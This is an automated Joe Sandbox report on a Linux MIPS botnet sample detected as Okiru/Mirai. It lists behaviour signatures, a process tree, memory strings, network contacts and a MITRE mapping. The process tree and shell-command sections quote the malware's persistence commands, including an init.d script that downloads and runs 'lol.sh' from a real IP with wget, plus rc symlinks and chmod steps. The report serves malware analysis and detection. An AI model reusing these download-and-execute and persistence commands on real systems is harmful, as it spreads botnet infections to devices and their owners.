Edit tour

Linux Analysis Report
mipsel.nn.elf

Overview

General Information

Sample name:	mipsel.nn.elf
Analysis ID:	1581266
MD5:	33e5b401b700dae33dbc37662d7dafee
SHA1:	57803abe6b1285e80bd503be667d09e1fc9b455a
SHA256:	865a14586914aecae92b653fe2d2ccaab5d525460dd1b9ce421f152b86f41a4e
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	84
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Sample deletes itself

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581266
Start date and time:	2024-12-27 09:17:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	mipsel.nn.elf
Detection:	MAL
Classification:	mal84.spre.troj.evad.linELF@0/10@0/0

Warnings

VT rate limit hit for: http://94.156.227.229/
VT rate limit hit for: http://94.156.227.229/lol.sh
VT rate limit hit for: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Runtime Messages

Command:	/tmp/mipsel.nn.elf
PID:	6207
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	The Gorilla Botnet Cats Came After You!
Standard Error:

Process Tree

system is lnxubuntu20

mipsel.nn.elf (PID: 6207, Parent: 6125, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mipsel.nn.elf

mipsel.nn.elf New Fork (PID: 6224, Parent: 6207)

sh (PID: 6224, Parent: 6207, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6231, Parent: 6224)

systemctl (PID: 6231, Parent: 6224, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

mipsel.nn.elf New Fork (PID: 6253, Parent: 6207)

sh (PID: 6253, Parent: 6207, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6256, Parent: 6253)

chmod (PID: 6256, Parent: 6253, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

mipsel.nn.elf New Fork (PID: 6257, Parent: 6207)

sh (PID: 6257, Parent: 6207, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6259, Parent: 6257)

ln (PID: 6259, Parent: 6257, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

mipsel.nn.elf New Fork (PID: 6260, Parent: 6207)

sh (PID: 6260, Parent: 6207, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"

mipsel.nn.elf New Fork (PID: 6266, Parent: 6207)

sh (PID: 6266, Parent: 6207, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6273, Parent: 6266)

chmod (PID: 6273, Parent: 6266, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mipsel.nn.elf

mipsel.nn.elf New Fork (PID: 6274, Parent: 6207)

sh (PID: 6274, Parent: 6207, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6279, Parent: 6274)

mkdir (PID: 6279, Parent: 6274, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

mipsel.nn.elf New Fork (PID: 6280, Parent: 6207)

sh (PID: 6280, Parent: 6207, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6285, Parent: 6280)

ln (PID: 6285, Parent: 6280, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf

mipsel.nn.elf New Fork (PID: 6286, Parent: 6207)

mipsel.nn.elf New Fork (PID: 6288, Parent: 6286)

mipsel.nn.elf New Fork (PID: 6290, Parent: 6286)

udisksd New Fork (PID: 6217, Parent: 799)

dumpe2fs (PID: 6217, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6244, Parent: 6243)

snapd-env-generator (PID: 6244, Parent: 6243, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 6301, Parent: 799)

dumpe2fs (PID: 6301, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6353, Parent: 799)

dumpe2fs (PID: 6353, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6354, Parent: 799)

dumpe2fs (PID: 6354, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

dash New Fork (PID: 6396, Parent: 4332)

rm (PID: 6396, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.URJbj7AbQI /tmp/tmp.oXh8TVRtl9 /tmp/tmp.ILWPfpc4gs

dash New Fork (PID: 6397, Parent: 4332)

rm (PID: 6397, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.URJbj7AbQI /tmp/tmp.oXh8TVRtl9 /tmp/tmp.ILWPfpc4gs

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
mipsel.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6207.1.00007f9574400000.00007f957441c000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: mipsel.nn.elf PID: 6207	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

String: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s

Source: global traffic

TCP traffic: 192.168.2.23:60004 -> 94.156.227.234:38242

Source: /tmp/mipsel.nn.elf (PID: 6207)

Socket: 0.0.0.0:38242

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: mipsel.nn.elf	String found in binary or memory: http://94.156.227.229/
Source: mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr	String found in binary or memory: http://94.156.227.229/lol.sh
Source: mipsel.nn.elf	String found in binary or memory: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33608
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofi

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/mipsel.nn.elf (PID: 6288)

SIGKILL sent: pid: 6397, result: no such process

Jump to behavior

Source: classification engine

Classification label: mal84.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/mipsel.nn.elf (PID: 6207)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/mipsel.nn.elf (PID: 6207)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6259)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6285)	File: /etc/rc.d/S99mipsel.nn.elf -> /etc/init.d/mipsel.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/mipsel.nn.elf (PID: 6207)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6256)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6273)	File: /etc/init.d/mipsel.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6372/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6034/cmdline	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6353/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6397/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6399/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6354/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6398/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/4332/cmdline	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6391/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6390/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6371/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6370/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6403/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6369/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6402/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6405/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6404/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6407/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6406/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6409/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6408/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6384/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6383/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6386/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6385/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6388/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6387/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6368/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6401/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6367/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6389/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6400/status	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6288)	File opened: /proc/6382/status	Jump to behavior

Source: /tmp/mipsel.nn.elf (PID: 6224)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6253)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6257)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6260)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6266)	Shell command executed: sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6274)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/mipsel.nn.elf (PID: 6280)	Shell command executed: sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6256)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6273)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mipsel.nn.elf			Jump to behavior

Source: /bin/sh (PID: 6279)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /usr/bin/dash (PID: 6396)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.URJbj7AbQI /tmp/tmp.oXh8TVRtl9 /tmp/tmp.ILWPfpc4gs			Jump to behavior
Source: /usr/bin/dash (PID: 6397)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.URJbj7AbQI /tmp/tmp.oXh8TVRtl9 /tmp/tmp.ILWPfpc4gs			Jump to behavior

Source: /bin/sh (PID: 6231)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/mipsel.nn.elf (PID: 6207)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6256)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6273)	File: /etc/init.d/mipsel.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/mipsel.nn.elf (PID: 6207)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/mipsel.nn.elf (PID: 6207)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6260)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mipsel.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/mipsel.nn.elf (PID: 6207)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6260)	File: /etc/init.d/mipsel.nn.elf			Jump to dropped file

Sample deletes itself

Source: /tmp/mipsel.nn.elf (PID: 6290)

File: /tmp/mipsel.nn.elf

Jump to behavior

Source: /tmp/mipsel.nn.elf (PID: 6207)

Queries kernel information via 'uname':

Jump to behavior

Source: mipsel.nn.elf, 6207.1.00007ffd4347b000.00007ffd4349c000.rw-.sdmp	Binary or memory string: U/tmp/qemu-open.9AgHYw\
Source: mipsel.nn.elf, 6207.1.000055926f098000.000055926f140000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: mipsel.nn.elf, 6207.1.00007ffd4347b000.00007ffd4349c000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.9AgHYw
Source: mipsel.nn.elf, 6207.1.00007ffd4347b000.00007ffd4349c000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXX
Source: mipsel.nn.elf, 6207.1.000055926f098000.000055926f140000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: mipsel.nn.elf, 6207.1.000055926f098000.000055926f140000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmtP /proc/3088/exeddressbooQ
Source: mipsel.nn.elf, 6207.1.000055926f098000.000055926f140000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmtP
Source: mipsel.nn.elf, 6207.1.00007ffd4347b000.00007ffd4349c000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mipsel.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mipsel.nn.elf
Source: mipsel.nn.elf, 6207.1.000055926f098000.000055926f140000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: mipsel.nn.elf, 6207.1.000055926f098000.000055926f140000.rw-.sdmp	Binary or memory string: U0!/usr/bin/vmtoolsd
Source: mipsel.nn.elf, 6207.1.00007ffd4347b000.00007ffd4349c000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: mipsel.nn.elf, type: SAMPLE
Source: Yara match	File source: 6207.1.00007f9574400000.00007f957441c000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mipsel.nn.elf PID: 6207, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: mipsel.nn.elf, type: SAMPLE
Source: Yara match	File source: 6207.1.00007f9574400000.00007f957441c000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mipsel.nn.elf PID: 6207, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	11 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
mipsel.nn.elf	38%	Virustotal		Browse
mipsel.nn.elf	42%	ReversingLabs	Linux.Backdoor.Mirai
mipsel.nn.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	0%	Avira URL Cloud	safe
http://94.156.227.229/	0%	Avira URL Cloud	safe
http://94.156.227.229/lol.sh	100%	Avira URL Cloud	malware

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.229/	mipsel.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	mipsel.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/lol.sh	mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.171.230.55	unknown	United States	16509	AMAZON-02US	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
94.156.227.234	unknown	Bulgaria	57463	NETIXBG	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54.171.230.55	feiwbps.elf	Get hash	malicious	Mirai	Browse
	most-mips.elf	Get hash	malicious	Unknown	Browse
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	byte.mips.elf	Get hash	malicious	Unknown	Browse
	most-x86_64.elf	Get hash	malicious	Mirai	Browse
	Mozi.m.elf	Get hash	malicious	Mirai	Browse
	byte.x86.elf	Get hash	malicious	Mirai, Okiru	Browse
	armv4eb.elf	Get hash	malicious	Unknown	Browse
